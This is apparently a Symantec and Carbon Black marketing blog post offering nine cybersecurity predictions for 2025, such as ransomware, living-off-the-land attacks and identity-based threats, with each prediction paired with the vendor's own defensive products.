9 More Predictions for 2025
And how you can protect yourself against a forecast of volatile threats.
On Dec. 17, the Symantec Threat Hunter Team’s Principal Editor Dick O’Brien distilled a year’s worth of first-hand cyberattack investigations into five top predictions that signal what the cybersecurity industry can expect to face in 2025. The predictions point to an uptick in Russian cyber aggression, a growing ransomware ecosystem, attackers targeting once-trusted cloud platforms, even more Living Off the Land (LOTL) tool use and ransomware groups expanding to new geos.
As usual, the insights from these renowned threat experts reveal what a high-value asset the Symantec Threat Hunter Team is to SecOp leaders everywhere. And while anticipating threats is essential to your defense, so is making sure you have in place the protections you need to mount that defense.
Predictions with solutions from our product experts
At Symantec and Carbon Black, our mission is to provide enterprise-grade security for all. Proliferating cybercrime tools and growing numbers of threat actors are putting all organizations at risk, so all organizations deserve the kind of protections that the largest enterprises have traditionally enjoyed. We polled our product experts for their own views on how to stay safe from the threats we’ll face in 2025 and beyond. Many even offered a few predictions of their own.
1. Russian aggressors (and every other kind) will face EDR and application control.
Attackers can strike from anywhere, but intelligent defenses make all the difference. With Carbon Black’s cloud-native endpoint detection and response (EDR) or Symantec’s on-premise EDR, organizations can detect network connections from Russian IP addresses and sniff out techniques used by criminal operations like Dragonfly targeting critical infrastructure. Application control, pioneered by Carbon Black and its predecessor Bit9, allows only trusted applications and files to run in your environment while helping block malicious code and executables—part of a zero trust posture. Carbon Black App Control can be deployed on-premise or in the cloud to protect assets other solutions don’t, like legacy systems and point-of-sale devices.
2. Ransomware attackers will bank on you having baseline protection.
Whether their weapon of choice is ransomware or another technique, attackers often make their move based on an assumption that your organization uses basic, table stakes protection. You need to prove them wrong. Protections like Symantec EDR and Carbon Black EDR can detect threat behaviors commonly associated with ransomware—behaviors that other frontline tools don’t pick up. Meanwhile, data loss prevention (DLP) solutions like Symantec DLP prevent access to sensitive data, no matter the attack vector. And data is what ransomware attacks are after.
3. Living Off the Land (LOTL) attacks may have less land to live off of.
LOTL attacks are on the rise, with threat actors using operating system features and tools to launch ransomware and other attacks. (Nearly half of ransomware attacks from 2021–2023 used LOTL tools.) The latest cybersecurity solutions can help prevent these incursions. One is Adaptive Protection, a unique feature of Symantec Endpoint Security (SES) that automatically blocks anomalous use of legitimate tools and software. In addition, Symantec EDR customers can subscribe to a watchlist of vulnerable and malicious drivers that could be LOTL targets.
4. "Identity" will become the next big domain in data-driven detection and analytical prevention.
Threat actors are now stealing identities and monitoring behaviors so they can fully masquerade as legitimate users—even ones with elevated privileges. It's getting harder and harder to identify these attacks based solely on tool use, and more and more necessary to incorporate identity and access information into the detection logic. The industry will revisit User and Entity Behavior Analytics (UEBA), guiding it along more integrated and targeted pathways.
5. Correlation will remain the holy grail, but centralization will be nuanced.
Everyone now accepts that cybersecurity must be data-driven, that a whole new level of telemetry must be collected and that information must be correlated across the domains of network, endpoint, information, identity and infrastructure. Vendors will think outside the box when it comes to centralization, leaning strongly into concepts like intelligent filtering, tiered aggregation and peer-like cross correlation—and will build architectures specialized for cybersecurity.
6. Customers will expect automation and commoditization of last decade’s breakthroughs.
A few years ago, customers weren’t willing to give management of potentially career-ending operational impact over to advanced analytics, machine learning or AI. But fast-forward to now and customers are asking, “If you can detect with confidence and respond with ease, why haven't you automated all that for us?” They want what was advanced and interactive a few years ago to become built-in and automatic. Vendors that have stored years of structured, curated attack analysis and world-class threat intel will be well-positioned to immediately take advantage of large-language models (LLMs) and deliver that future. Vendors lacking these will struggle.
7. Threat detection and response will consolidate across hybrid environments.
Hybrid work environments are intensifying the challenge of securing endpoints across diverse on-premises and cloud systems. In 2025, unified threat detection and response systems will become essential. These platforms will need to combine EDR, extended detection and response (XDR) and security orchestration to monitor, detect and remediate threats in real time. The shift leverages automation and threat intelligence to reduce blind spots across distributed workforces and accelerate response times. Solutions offering deep visibility into endpoint behaviors and integration with broader threat intelligence ecosystems are the ones best poised to address this need.
8. Advanced data loss prevention (DLP) strategies will focus on decentralized workflows.
The rise of generative AI tools, remote work and decentralized workflows has heightened the risk of inadvertent or malicious data leakage. Organizations will prioritize advanced DLP strategies incorporating context-aware data protection and (as noted above) intelligent user behavior analytics. In 2025, DLP solutions will evolve with natural language processing (NLP) and machine learning, enabling real-time detection of sensitive data sharing across collaboration platforms and cloud services. Proactive measures, like automated redaction and granular access controls, will also gain prominence.
9. Cybersecurity sales channel strategies will shift.
Traditional sales channels are no longer equipped to handle the complexities of today’s cybersecurity landscape. Organizations increasingly recognize that scaling their channel strategies requires more than just transactional partnerships—it demands a collaborative ecosystem where partners are empowered with the tools, training and insights needed to deliver seamless, integrated solutions through local partners they know and trust. As we move into 2025, a new channel go-to-market model, led by Broadcom’s groundbreaking Catalyst Partner Program, is poised to set a trend that other technology companies will likely follow.
These won’t be the only trends that define 2025, but it’s a safe bet they will land on your radar at some point. When they do, I hope you have the protections in place to meet the challenges of this coming year with confidence and competence.
Questions? Concerns? Contact us, and we’ll get you in touch with a local expert who can help.
We encourage you to share your thoughts on your favorite social platform.